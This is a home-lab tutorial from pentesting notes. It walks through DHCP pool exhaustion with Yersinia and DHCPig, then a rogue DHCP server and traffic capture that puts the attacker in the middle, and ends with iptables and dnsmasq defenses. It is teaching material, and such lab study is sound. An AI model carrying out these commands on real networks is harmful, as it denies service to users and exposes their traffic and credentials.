> For the complete documentation index, see [llms.txt](https://mainekhacker-1.gitbook.io/mainekhacker/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://mainekhacker-1.gitbook.io/mainekhacker/networkpentestingnotes/dhcp-starvation-attack.md). # DHCP Starvation Attack ## DHCP Starvation Attack – Complete Home Lab Guide * Use a tool like Yersinia to launch a DHCP starvation attack against a target system. * Analyze the response to determine if the attack was successful. ### What Is DHCP and Why Does It Matter First Before the attack, understand what DHCP actually does. When any device connects to a network — your phone, laptop, anything — it needs an IP address to communicate. DHCP is the system that automatically hands out these IP addresses. Think of it like a hotel receptionist who gives room keys to guests when they check in. ``` Your Device joins network → Says "I need an IP address please" DHCP Server hears this → Checks available IPs in its pool DHCP Server replies → "Here, use 192.168.56.50, it's yours for 24 hours" Your Device → Now has an IP and can communicate ``` The DHCP server has a **limited pool** of IP addresses it can hand out. For example it might have addresses from `192.168.56.1` to `192.168.56.254` — that's only 253 addresses total. ### What DHCP Starvation Does DHCP Starvation exploits one simple weakness — **the DHCP server hands out addresses based on MAC addresses, and MAC addresses can be faked**. The attack works like this: ``` Attacker pretends to be thousands of different devices Each fake device asks for an IP address DHCP server hands out real IPs to each fake request Pool runs out of available IPs Real legitimate devices join the network DHCP server has nothing left to give them Real devices cannot connect — they are starved out ``` Going back to the hotel analogy — imagine someone walks up to the receptionist with thousands of fake IDs and books every single room. Now real guests arrive and there are no rooms left for them. ``` Normal situation: Pool: [.50][.51][.52][.53]...[.254] — 200 addresses available Real devices get addresses fine After starvation attack: Pool: [GONE][GONE][GONE][GONE]...[GONE] — all taken by fake requests Real device joins — sorry no addresses available Real device cannot get on network ``` ### Why Real Attackers Use This In real attacks DHCP starvation is rarely the end goal. It is usually **step one of a bigger attack** called a Rogue DHCP attack: ``` Step 1: Attacker runs DHCP starvation → Legitimate DHCP server runs out of addresses → Real DHCP server is effectively dead Step 2: Attacker sets up their OWN fake DHCP server → New devices join network looking for IP addresses → Attacker's fake server responds first → Attacker gives out IPs but also sets THEMSELVES as the gateway Step 3: All traffic from victim devices now routes through attacker → Attacker sees all passwords, cookies, emails → This is a full Man in the Middle attack → Victims have no idea this is happening ``` This is how attackers in coffee shops, hotels, and corporate networks intercept traffic without touching any device directly. ### Lab Architecture ``` VirtualBox Host-Only Network: 192.168.56.0/24 ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │ Kali Linux │ │ Ubuntu Server │ │ Victim VM │ │ (Attacker) │────▶│ (DHCP Server) │◀────│ (Any Linux/Win) │ │ 192.168.56.101 │ │ 192.168.56.102 │ │ Gets IP via DHCP│ │ │ │ Running dnsmasq │ │ │ └─────────────────┘ └─────────────────┘ └─────────────────┘ All three on same Host-Only network adapter ``` {% stepper %} {% step %} ### Step 1 – Set Up DHCP Server on Ubuntu **Install dnsmasq (handles both DNS and DHCP):** ```bash sudo apt update sudo apt install dnsmasq -y ``` **Configure dnsmasq as DHCP server:** ```bash sudo nano /etc/dnsmasq.conf ``` Add these lines: ``` # DHCP configuration dhcp-range=192.168.56.50,192.168.56.150,12h # This gives out IPs from .50 to .150 # Only 100 addresses in the pool # 12h means lease lasts 12 hours dhcp-option=3,192.168.56.1 # default gateway dhcp-option=6,192.168.56.102 # DNS server # Log all DHCP activity so we can watch the attack log-dhcp log-facility=/var/log/dnsmasq.log interface=eth0 bind-interfaces ``` **Restart dnsmasq:** ```bash sudo systemctl restart dnsmasq sudo systemctl status dnsmasq ``` **Verify DHCP is working before the attack:** ```bash # Watch the DHCP log in real time sudo tail -f /var/log/dnsmasq.log ``` {% endstep %} {% step %} ### Step 2 – Install Yersinia on Kali Yersinia is a network protocol attack tool that specializes in Layer 2 attacks including DHCP starvation. ```bash sudo apt update sudo apt install yersinia -y # Verify installation yersinia --version ``` **Also install additional tools we will use:** ```bash sudo apt install dhcpig macchanger nmap -y ``` {% endstep %} {% step %} ### Step 3 – Understand What Yersinia Will Do Before launching, understand the DHCP conversation that happens normally: ``` DISCOVER → Device broadcasts "Anyone have an IP for me?" OFFER → DHCP server replies "Yes I have 192.168.56.55 for you" REQUEST → Device says "Yes please I want that IP" ACK → DHCP server confirms "It is yours, lease starts now" ``` This is called the **DORA process** — Discover, Offer, Request, Acknowledge. Yersinia will spam thousands of fake DISCOVER and REQUEST messages, each with a different spoofed MAC address. The server will hand out a real IP for each one and eventually run out. {% endstep %} {% step %} ### Step 4 – Launch DHCP Starvation with Yersinia {% tabs %} {% tab title="Method 1 – Yersinia Graphical Interface" %} ```bash sudo yersinia -G ``` In the GUI: ``` 1. Click "Launch Attack" in the menu 2. Select "DHCP" tab 3. Choose "sending DISCOVER packets" 4. Set interface to eth0 5. Click "OK" ``` {% endtab %} {% tab title="Method 2 – Yersinia Command Line (recommended for learning)" %} ```bash # Check your network interface name first ip addr show # Launch DHCP starvation attack sudo yersinia dhcp -attack 1 -interface eth0 # attack 1 = DHCP starvation (sending mass DISCOVER packets) # This floods the DHCP server with fake requests ``` {% endtab %} {% tab title="Method 3 – Interactive mode (best for understanding)" %} ```bash sudo yersinia -I # Inside interactive mode: # Press h for help # Press F2 to select DHCP protocol # Press x to see attack options # Press 1 to launch DHCP starvation # Press q to quit ``` {% endtab %} {% endtabs %} {% endstep %} {% step %} ### Step 5 – Watch the Attack Happening in Real Time Open multiple terminals to watch everything simultaneously. **Terminal 1 – Watch DHCP leases being handed out on Ubuntu:** ```bash sudo tail -f /var/log/dnsmasq.log ``` You will see entries flooding in like: ``` DHCPDISCOVER from aa:bb:cc:dd:ee:01 DHCPOFFER 192.168.56.50 to aa:bb:cc:dd:ee:01 DHCPREQUEST for 192.168.56.50 from aa:bb:cc:dd:ee:01 DHCPACK 192.168.56.50 to aa:bb:cc:dd:ee:01 DHCPDISCOVER from aa:bb:cc:dd:ee:02 DHCPOFFER 192.168.56.51 to aa:bb:cc:dd:ee:02 ...continuing for hundreds of fake MACs... ``` **Terminal 2 – Watch the DHCP pool getting exhausted:** ```bash # Check current leases on Ubuntu server cat /var/lib/misc/dnsmasq.leases ``` Count the leases: ```bash wc -l /var/lib/misc/dnsmasq.leases ``` Watch this number climb from 0 to 100 (pool exhausted). **Terminal 3 – Monitor network traffic on Kali:** ```bash sudo tcpdump -i eth0 port 67 or port 68 -v # Port 67 = DHCP server port # Port 68 = DHCP client port ``` {% endstep %} {% step %} ### Step 6 – Confirm Attack Success **Check if pool is exhausted on Ubuntu:** ```bash # Count active leases wc -l /var/lib/misc/dnsmasq.leases # If this equals your pool size (100 in our config) — attack succeeded ``` **Try to get a new IP from victim machine:** On your third VM (victim) or from Kali: ```bash # Release current IP and request a new one sudo dhclient -r eth0 # release current IP sudo dhclient eth0 # request new IP ``` If attack succeeded you will see: ``` DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 3 DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 6 DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 12 # Keeps retrying but never gets a response # No IP address assigned # Device cannot connect to network ``` That is DHCP starvation confirmed — the pool is empty. {% endstep %} {% step %} ### Step 7 – Take It Further – Rogue DHCP Attack Now demonstrate why starvation is step one of a bigger attack. **While legitimate DHCP server is starved, start rogue DHCP on Kali:** ```bash # Install and configure a rogue DHCP server on Kali sudo apt install isc-dhcp-server -y sudo nano /etc/dhcp/dhcpd.conf ``` Add this config: ``` subnet 192.168.56.0 netmask 255.255.255.0 { range 192.168.56.200 192.168.56.220; # THIS IS THE ATTACK # We tell victims to use US as their gateway # All their traffic routes through us option routers 192.168.56.101; # Kali IP = fake gateway option domain-name-servers 192.168.56.101; # Kali as DNS too default-lease-time 600; max-lease-time 7200; } ``` ```bash # Start the rogue DHCP server sudo systemctl start isc-dhcp-server ``` Now when victim tries to get an IP — they get one from the attacker's rogue server, with the attacker's IP as their gateway. All traffic flows through Kali. **Enable IP forwarding on Kali so victims still have internet (they won't notice):** ```bash sudo echo 1 > /proc/sys/net/ipv4/ip_forward # Forward their traffic while we inspect it sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE ``` **Capture victim traffic:** ```bash sudo tcpdump -i eth0 -w /tmp/victim_traffic.pcap ``` The victim has internet access and suspects nothing while every packet they send goes through the attacker. {% endstep %} {% step %} ### Step 8 – Alternative Tool DHCPig If Yersinia gives issues, DHCPig is simpler: ```bash # Install sudo apt install dhcpig -y # Launch starvation sudo pig.py eth0 # Watch it exhaust the pool ``` {% endstep %} {% step %} ### Step 9 – Defense Against DHCP Starvation After the attack, implement defenses and verify they work. **Defense 1 – DHCP Snooping (on managed switches in real networks):** In a home lab we simulate this with iptables: ```bash # On Ubuntu DHCP server # Rate limit DHCP requests per MAC sudo iptables -A INPUT -p udp --dport 67 \ -m hashlimit \ --hashlimit-name dhcp \ --hashlimit-above 5/minute \ --hashlimit-mode srcmac \ -j DROP ``` **Defense 2 – Limit lease pool and set short lease times:** ```bash sudo nano /etc/dnsmasq.conf # Change lease time to very short dhcp-range=192.168.56.50,192.168.56.150,2m # 2 minute leases means fake leases expire quickly ``` **Defense 3 – Static IP reservations for known devices:** ```bash # In dnsmasq.conf, reserve IPs for known MAC addresses dhcp-host=aa:bb:cc:dd:ee:ff,192.168.56.50,hostname # Unknown MACs get nothing ``` **Verify defense works:** ```bash # Run yersinia attack again sudo yersinia dhcp -attack 1 -interface eth0 # Watch the log — requests should be rate limited now sudo tail -f /var/log/dnsmasq.log ``` {% endstep %} {% endstepper %} ### What You Should See at Each Stage ``` Stage 1 — Before attack: DHCP pool: 100 addresses available Victim gets IP: instantly, works fine Stage 2 — During attack (Yersinia running): DHCP log: flooding with fake MAC requests Pool: draining rapidly, 100→50→10→0 Yersinia terminal: sending thousands of packets Stage 3 — Pool exhausted: Victim tries to connect: keeps sending DISCOVER Server log: DHCPNAK or silence — nothing to offer Victim: no IP, cannot use network Stage 4 — Rogue DHCP running: Victim connects: gets IP from attacker's server Victim's gateway: points to Kali Attacker: sees all victim traffic in tcpdump ``` ### Quick Reference | Tool | Command | Purpose | | --------------- | ----------------------------------------- | --------------------------- | | Yersinia CLI | `yersinia dhcp -attack 1 -interface eth0` | Launch starvation | | Yersinia GUI | `yersinia -G` | Graphical attack | | DHCPig | `pig.py eth0` | Alternative starvation tool | | Watch leases | `tail -f /var/log/dnsmasq.log` | See pool draining | | Count leases | `wc -l /var/lib/misc/dnsmasq.leases` | Confirm exhaustion | | Victim test | `dhclient -r eth0 && dhclient eth0` | Confirm denial | | Capture traffic | `tcpdump -i eth0 port 67 or 68` | Watch DHCP packets | ### How Real Attackers Use This In real corporate environments this attack is particularly dangerous for three reasons. First, most organizations use unmanaged or poorly configured switches that have no DHCP snooping enabled — meaning there is nothing stopping a rogue DHCP server from responding to clients. Second, once an attacker has positioned themselves as the gateway through the rogue DHCP step, they can perform SSL stripping attacks to downgrade HTTPS connections to HTTP and read credentials in plain text — even on supposedly secure websites. Third, this attack requires only physical or WiFi access to the network segment — an attacker who walks into an office, plugs in a Raspberry Pi, and leaves has everything they need running automatically. This is why penetration testers specifically test for DHCP snooping configuration during network security assessments. Lab Completed! Thankyou for Reading... --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://mainekhacker-1.gitbook.io/mainekhacker/networkpentestingnotes/dhcp-starvation-attack.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.